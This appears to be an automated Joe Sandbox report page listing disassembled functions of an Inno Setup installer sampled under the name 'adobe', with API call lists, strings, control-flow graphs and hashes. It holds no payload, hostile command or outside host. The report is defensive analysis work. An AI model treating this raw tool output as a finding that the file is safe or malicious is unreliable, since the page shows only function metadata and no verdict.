                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                          • API String ID: 47109696-1093091907
                                                                                                                                                          • Opcode ID: 1d188d70321b384fe507a1042696dead03e7cb7066f133a58f2e98169c3637a3
                                                                                                                                                          • Instruction ID: b5a6e33e5d6cd5810e5f3773d63e06d533fa2f0377129b81ba32e032a1e41e34
                                                                                                                                                          • Opcode Fuzzy Hash: 1d188d70321b384fe507a1042696dead03e7cb7066f133a58f2e98169c3637a3
                                                                                                                                                          • Instruction Fuzzy Hash: 7A51C470A002489BDB15DB55D941BDEB7F4EF45304FA082BEE840A73A1EB386F05CB5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047BAC0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2024 47bac0-47bb16 call 42c40c call 4035c0 call 47b73c call 451c48 2033 47bb22-47bb31 call 451c48 2024->2033 2034 47bb18-47bb1d call 4529b4 2024->2034 2038 47bb33-47bb39 2033->2038 2039 47bb4b-47bb51 2033->2039 2034->2033 2040 47bb5b-47bb63 call 403494 2038->2040 2041 47bb3b-47bb41 2038->2041 2042 47bb53-47bb59 2039->2042 2043 47bb68-47bb90 call 42e2bc * 2 2039->2043 2040->2043 2041->2039 2044 47bb43-47bb49 2041->2044 2042->2040 2042->2043 2050 47bbb7-47bbd1 GetProcAddress 2043->2050 2051 47bb92-47bbb2 call 4078fc call 4529b4 2043->2051 2044->2039 2044->2040 2052 47bbd3-47bbd8 call 4529b4 2050->2052 2053 47bbdd-47bbfa call 403400 * 2 2050->2053 2051->2050 2052->2053
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(6FBB0000,SHGetFolderPathA), ref: 0047BBC2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$n_I$shell32.dll$shfolder.dll
                                                                                                                                                          • API String ID: 190572456-1193724077
                                                                                                                                                          • Opcode ID: bf0e4de9c88724b4e32ec7b820957a57ff88107709c111f3b0c3a65d85df620b
                                                                                                                                                          • Instruction ID: f7ce2b1eafdc37c3bb537123c7076bcfbe421214df57355c4a23a81ac9a414e3
                                                                                                                                                          • Opcode Fuzzy Hash: bf0e4de9c88724b4e32ec7b820957a57ff88107709c111f3b0c3a65d85df620b
                                                                                                                                                          • Instruction Fuzzy Hash: 60310B70A00209DFDB11EB95D982ADEB7B4EB44304F60C46BE804E7755DB38AE058BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2173 406334-40634e GetModuleHandleA GetProcAddress 2174 406350 2173->2174 2175 406357-406364 GetProcAddress 2173->2175 2174->2175 2176 406366 2175->2176 2177 40636d-40637a GetProcAddress 2175->2177 2176->2177 2178 406380-406381 2177->2178 2179 40637c-40637e SetProcessDEPPolicy 2177->2179 2179->2178
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                          • API String ID: 3256987805-3653653586
                                                                                                                                                          • Opcode ID: c5d833707bbe84355b8418dd79821f883282b140f662e0c791f670913e97737e
                                                                                                                                                          • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                                                                                          • Opcode Fuzzy Hash: c5d833707bbe84355b8418dd79821f883282b140f662e0c791f670913e97737e
                                                                                                                                                          • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98windowregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2813 423884-42388e 2814 4239b7-4239bb 2813->2814 2815 423894-4238b6 call 41f3d4 GetClassInfoA 2813->2815 2818 4238e7-4238f0 GetSystemMetrics 2815->2818 2819 4238b8-4238cf RegisterClassA 2815->2819 2821 4238f2 2818->2821 2822 4238f5-4238ff GetSystemMetrics 2818->2822 2819->2818 2820 4238d1-4238e2 call 408cc4 call 40311c 2819->2820 2820->2818 2821->2822 2824 423901 2822->2824 2825 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2822->2825 2824->2825 2836 423962-423975 call 424188 SendMessageA 2825->2836 2837 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2825->2837 2836->2837 2837->2814 2839 4239aa-4239b2 DeleteMenu 2837->2839 2839->2814
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                          • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                                                                                          • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                                                                                          • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                                                                                          • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                                                                                          • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 183575631-0
                                                                                                                                                          • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                                                                                          • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                                                                                          • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                                                                                          • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00466994 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2841 466994-466a3e call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2850 466a73-466a7e call 477a20 2841->2850 2851 466a40-466a47 2841->2851 2856 466a80-466ac5 call 42c40c call 40357c call 403738 ExtractIconA call 4668d4 2850->2856 2857 466acf-466ae2 call 47bf84 2850->2857 2851->2850 2852 466a49-466a6e ExtractIconA call 4668d4 2851->2852 2852->2850 2879 466aca 2856->2879 2862 466ae4-466aee call 47bf84 2857->2862 2863 466af3-466af7 2857->2863 2862->2863 2866 466b51-466b85 call 403400 * 2 2863->2866 2867 466af9-466b1c call 403738 SHGetFileInfo 2863->2867 2867->2866 2875 466b1e-466b25 2867->2875 2875->2866 2878 466b27-466b4c ExtractIconA call 4668d4 2875->2878 2878->2866 2879->2866
                                                                                                                                                          APIs
                                                                                                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
                                                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D
                                                                                                                                                            • Part of subcall function 004668D4: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 0046696C
                                                                                                                                                            • Part of subcall function 004668D4: DestroyCursor.USER32(00000000), ref: 00466982
                                                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4
                                                                                                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466B15
                                                                                                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466B3B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                          • String ID: c:\directory$shell32.dll${H
                                                                                                                                                          • API String ID: 3376378930-1386800945
                                                                                                                                                          • Opcode ID: c5a97e1796b603ed3f0fdb04179c7fc19f7dcfe0223a9713a433198ec33ab6e5
                                                                                                                                                          • Instruction ID: bb42604bc5e62439ed76953f0acd9fdfc54ee7023d6ada76ef8daf36ea167999
                                                                                                                                                          • Opcode Fuzzy Hash: c5a97e1796b603ed3f0fdb04179c7fc19f7dcfe0223a9713a433198ec33ab6e5
                                                                                                                                                          • Instruction Fuzzy Hash: 7B518F70600218AFDB10EF65CD8AFCEB7E8EB48704F1181B6B408E7351D638AE81CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047B794 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 108COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B827
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B830
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$qI
                                                                                                                                                          • API String ID: 1375471231-3882068889
                                                                                                                                                          • Opcode ID: 65bf9df88311f7e70d98ca3ccf54c78a0b3cdf80d0a15da0aa22ddd0f6c1404e
                                                                                                                                                          • Instruction ID: 4382150b65a239bcd865909c49c5e3b79134296aa5f4b8b5b06b090679d32ad3
                                                                                                                                                          • Opcode Fuzzy Hash: 65bf9df88311f7e70d98ca3ccf54c78a0b3cdf80d0a15da0aa22ddd0f6c1404e
                                                                                                                                                          • Instruction Fuzzy Hash: DE414B74A002099FDB01FFA5D882ADEB7B5EF44305F50843BE51477392DB389E058B99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042F3D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetActiveWindow.USER32 ref: 0042F403
                                                                                                                                                          • GetFocus.USER32 ref: 0042F40B
                                                                                                                                                          • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                                                                                          • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457B52,00000000,0049A628), ref: 0042F4C8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                                          • String ID: TWindowDisabler-Window
                                                                                                                                                          • API String ID: 3167913817-1824977358
                                                                                                                                                          • Opcode ID: 6e075dc944e6bccec8fc0ef0846665b26f07f281cab91b1318fedc60cd50076b
                                                                                                                                                          • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                                                                                          • Opcode Fuzzy Hash: 6e075dc944e6bccec8fc0ef0846665b26f07f281cab91b1318fedc60cd50076b
                                                                                                                                                          • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00452860 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                          • API String ID: 1646373207-2130885113
                                                                                                                                                          • Opcode ID: 014cbfd88cbada2ba2f6fc5422e975ead1d93f81a2bbc97b1ed3d865edbeb017
                                                                                                                                                          • Instruction ID: 38ce7f80dd5b36a1f2e55088805320c2eb6a0e4d57c6e62c3df02668c3b9852d
                                                                                                                                                          • Opcode Fuzzy Hash: 014cbfd88cbada2ba2f6fc5422e975ead1d93f81a2bbc97b1ed3d865edbeb017
                                                                                                                                                          • Instruction Fuzzy Hash: 470184B0700304AED701ABA29D03B9B3A58E756726F50443BF800A6297D7FC5818CA7D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004307B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                                                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                                          • API String ID: 4130936913-2943970505
                                                                                                                                                          • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                                                                                          • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                                                                                                          • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                                                                                                          • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045453C Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758,00000000), ref: 004546E6
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758), ref: 004546F3
                                                                                                                                                            • Part of subcall function 004544A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
                                                                                                                                                            • Part of subcall function 004544A8: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
                                                                                                                                                            • Part of subcall function 004544A8: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
                                                                                                                                                            • Part of subcall function 004544A8: CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                                                          • API String ID: 854858120-615399546
                                                                                                                                                          • Opcode ID: 16bd8859f69d7ba7d01eaf290ec18c35fb36c9f0db53f45a1a4ed95e06a92c12
                                                                                                                                                          • Instruction ID: 5898c24bda719508e952bf5cb01f3f8a52e5154d5b1a7f0c1159f75b82703416
                                                                                                                                                          • Opcode Fuzzy Hash: 16bd8859f69d7ba7d01eaf290ec18c35fb36c9f0db53f45a1a4ed95e06a92c12
                                                                                                                                                          • Instruction Fuzzy Hash: 67513C30A0034DABDB01EF95C882BDEBBB9AF45309F514437F8047B286D77C5A498759
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                          • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
